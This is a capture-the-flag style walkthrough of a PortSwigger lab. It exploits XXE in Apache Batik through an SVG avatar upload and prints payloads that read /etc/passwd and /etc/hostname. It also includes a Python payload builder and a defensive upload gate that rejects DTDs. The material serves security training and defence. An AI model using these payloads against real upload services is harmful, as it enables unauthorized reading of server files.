PortSwigger Lab: Exploiting XXE via image file upload | WalkThrough

WraithOP
3 min read · Jan 2, 2022

Introduction

Hello everyone, in this post I am going to share my write-up of the PortSwigger lab "Exploiting XXE via image file upload". The comment section has an avatar upload function that uses an older version of the Apache Batik library, which is vulnerable to XXE injection. We will use this vulnerability to read the contents of the /etc/hostname file and solve the lab.

Target

This lab lets users attach avatars to comments and uses the Apache Batik library to process avatar image files.

To solve the lab, upload an image that displays the contents of the /etc/hostname file after processing. Then use the "Submit solution" button to submit the value of the server hostname.

Detection

Every post has a comment section where we can upload an avatar. From the lab description we already know that the server processes avatars with the Apache Batik library.

After searching for vulnerabilities in the Apache Batik library I came across an article describing the following issue.

In this vulnerability the web application lets clients upload a Scalable Vector Graphics (SVG) document and receive the contents back as a rasterized JPG or PNG file. Because SVG is an XML format, the parsing routine is potentially prone to XXE injection attacks: a DOCTYPE that declares an external entity can make the parser read a local file and substitute its contents into the document before it is rendered.

So create a file test.svg and paste the payload given below:

<?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">&xxe;</svg>

Upload test.svg as your avatar together with a comment, then right-click on the avatar in your comment and click "View Image". The image renders but is empty: the entity reference sits directly under <svg> rather than inside a <text> element, so there is nothing for Batik to draw. The server accepted an SVG carrying a DOCTYPE and an external entity without rejecting it, which is consistent with the parser resolving the entity and indicates that the website is vulnerable; the next step confirms it by rendering the file contents as text.

Exploitation

Now replace the content of test.svg with the payload below, which wraps the entity reference in a <text> element so that its expansion is actually rendered:

<?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg width="500px" height="100px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-family="Verdana" font-size="16" x="10" y="40">&xxe;</text></svg>

After uploading it and viewing the image we can see that something is written, but the image is too small for the text to be readable.

After changing the width and height in the payload to 500px by 500px, let's upload it and test again.

The contents of /etc/passwd are now clearly visible in the rendered avatar.

Now let's read /etc/hostname the same way: change the entity's SYSTEM target from file:///etc/passwd to file:///etc/hostname, upload the new avatar and view the image.

Submit the hostname shown in the image using the "Submit solution" button to complete the lab.
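To make the two payloads above reproducible, and to show what the server side should have done with them, here is a small Python script added to this write-up; it is not code from the lab, from PortSwigger or from Apache Batik. It builds the detection payload (bare entity reference under <svg>) and the exploitation payload (entity reference inside <text>) for any file path and image size, and includes a hypothetical upload gate, svg_declares_entities, that flags any SVG carrying a DOCTYPE or entity declaration before it reaches a rasterizer. It uses svg as the DOCTYPE name where the page's payload uses ernw; the name is not what triggers the entity resolution. The sample clean SVG in the test is constructed for illustration.

```python
"""Build the Batik XXE avatar payloads from the walkthrough and show the
server-side check that should reject them. Added example code, not the
lab's or Batik's own; sizes and the gate helper are assumptions."""
import xml.parsers.expat


def build_xxe_svg(path: str, width: int = 500, height: int = 500,
                  font_size: int = 16, wrap_in_text: bool = True) -> str:
    """Return an SVG whose external entity `xxe` points at `path`.

    wrap_in_text=False reproduces the detection payload: the entity sits
    directly under <svg>, is resolved, but nothing is drawn, so the
    avatar renders blank. wrap_in_text=True puts the expansion inside a
    <text> element so the file contents are rasterised into the image.
    """
    if wrap_in_text:
        body = (f'<text font-family="Verdana" font-size="{font_size}" '
                'x="10" y="40">&xxe;</text>')
    else:
        body = "&xxe;"
    return (
        '<?xml version="1.0" standalone="yes"?>'
        f'<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file://{path}" > ]>'
        f'<svg width="{width}px" height="{height}px" '
        'xmlns="http://www.w3.org/2000/svg" '
        'xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">'
        f"{body}</svg>"
    )


def svg_declares_entities(svg_bytes: bytes) -> bool:
    """Hypothetical upload gate: True if the document carries a DOCTYPE or
    any entity declaration, or is not well-formed XML.

    An avatar never needs a DTD, so anything that declares one is rejected
    before it reaches the rasterizer. Only expat's declaration callbacks
    are used; no entity is resolved and no file or URL is fetched.
    """
    found = False

    def on_doctype(name, sysid, pubid, has_internal_subset):
        nonlocal found
        found = True

    def on_entity(*decl):
        nonlocal found
        found = True

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(svg_bytes, True)
    except xml.parsers.expat.ExpatError:
        return True  # malformed input: reject rather than guess
    return found


if __name__ == "__main__":
    # Write the two files used in the walkthrough, then show the gate's verdict.
    with open("test-detect.svg", "w") as fh:
        fh.write(build_xxe_svg("/etc/passwd", height=40, wrap_in_text=False))
    with open("test.svg", "w") as fh:
        fh.write(build_xxe_svg("/etc/hostname"))
    payload = build_xxe_svg("/etc/hostname").encode()
    print("gate rejects XXE payload:", svg_declares_entities(payload))
```

Upload test-detect.svg first to reproduce the blank avatar, then test.svg to render /etc/hostname. The gate is the mitigation a practitioner would expect on the server: rejecting DOCTYPEs outright is simpler and safer than trying to configure every XML feature of the rasterizer, and it costs nothing for avatar uploads, which never legitimately need a DTD.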
